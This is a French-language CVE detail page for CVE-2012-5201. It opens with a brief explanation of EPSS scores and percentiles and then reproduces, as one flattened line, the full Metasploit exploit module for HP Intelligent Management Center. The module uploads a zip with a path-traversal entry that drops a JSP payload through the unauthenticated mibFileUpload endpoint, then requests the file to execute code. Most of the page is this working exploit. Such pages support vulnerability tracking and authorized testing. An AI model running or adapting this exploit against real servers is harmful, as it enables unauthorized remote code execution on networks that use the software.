CVE-2012-5201 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'HP Intelligent Management Center Arbitrary File Upload', 'Description' => %q{ This module exploits a code execution flaw in HP Intelligent Management Center. The vulnerability exists in the mibFileUpload which is accepting unauthenticated file uploads and handling zip contents in a insecure way. Combining both weaknesses a remote attacker can accomplish arbitrary file upload. This module has been tested successfully on HP Intelligent Management Center 5.1 E0202 over Windows 2003 SP2. }, 'Author' => [ 'rgod <rgod[at]autistici.org>', # Vulnerability Discovery 'juan vazquez' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2012-5201' ], [ 'OSVDB', '91026' ], [ 'BID', '58385' ], [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-050/' ], [ 'URL', 'https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03689276' ] ], 'Privileged' => true, 'Platform' => 'win', 'Arch' => ARCH_JAVA, 'Targets' => [ [ 'HP Intelligent Management Center 5.1 E0202 / Windows', { } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Mar 07 2013')) register_options( [ Opt::RPORT(8080), OptString.new('TARGETURI', [true, 'Path to HP Intelligent Management Center', '/imc']) ], self.class) end def check res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path.to_s, "login.jsf"), 'method' => 'GET' }) if res and res.code == 200 and res.body =~ /HP Intelligent Management Center/ return Exploit::CheckCode::Detected end return Exploit::CheckCode::Safe end def exploit @peer = "#{rhost}:#{rport}" # New lines are handled on the vuln app and payload is corrupted jsp = payload.encoded.gsub(/\x0d\x0a/, "").gsub(/\x0a/, "") jsp_name = "#{rand_text_alphanumeric(4+rand(32-4))}.jsp" # Zipping with CM_STORE to avoid errors while zip decompressing # on the Java vulnerable application zip = Rex::Zip::Archive.new(Rex::Zip::CM_STORE) zip.add_file("../../../../../../../ROOT/#{jsp_name}", jsp) post_data = Rex::MIME::Message.new post_data.add_part(zip.pack, "application/octet-stream", nil, "form-data; name=\"#{Rex::Text.rand_text_alpha(4+rand(4))}\"; filename=\"#{Rex::Text.rand_text_alpha(4+rand(4))}.zip\"") # Work around an incompatible MIME implementation data = post_data.to_s data.gsub!(/\r\n\r\n--_Part/, "\r\n--_Part") print_status("#{@peer} - Uploading the JSP payload...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path.to_s, "webdm", "mibbrowser", "mibFileUpload"), 'method' => 'POST', 'data' => data, 'ctype' => "multipart/form-data; boundary=#{post_data.bound}", 'cookie' => "JSESSIONID=#{Rex::Text.rand_text_hex(32)}" }) if res and res.code == 200 and res.body.empty? print_status("#{@peer} - JSP payload uploaded successfully") register_files_for_cleanup(jsp_name) else fail_with(Exploit::Failure::Unknown, "#{@peer} - JSP payload upload failed") end print_status("#{@peer} - Executing payload...") send_request_cgi({ 'uri' => normalize_uri(jsp_name), 'method' => 'GET' }) end end